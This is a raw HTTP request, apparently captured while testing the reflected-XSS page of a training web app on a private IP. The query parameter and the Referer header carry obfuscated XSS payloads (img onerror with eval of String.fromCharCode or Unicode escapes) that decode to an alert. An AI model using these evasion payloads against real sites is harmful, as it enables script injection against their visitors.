GET /vulnerabilities/xss_r/?name=222%3Cimg+src%3D1+onerror%3Deval%28String.fromCharCode%2897%2C108%2C101%2C114%2C116%2C40%2C34%2C120%2C115%2C115%2C34%2C41%29%29%3E%3C%2Fimg%3E HTTP/1.1
Host: 10.10.3.128
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128/vulnerabilities/xss_r/?name=aaa%3Cimg+src%3D1+onerror%3Deval%28%22%5Cu0061%5Cu006c%5Cu0065%5Cu0072%5Cu0074%5Cu0028%5Cu0027%5Cu0078%5Cu0073%5Cu0073%5Cu0027%5Cu0029%22%29%3E%3C%2Fimg%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

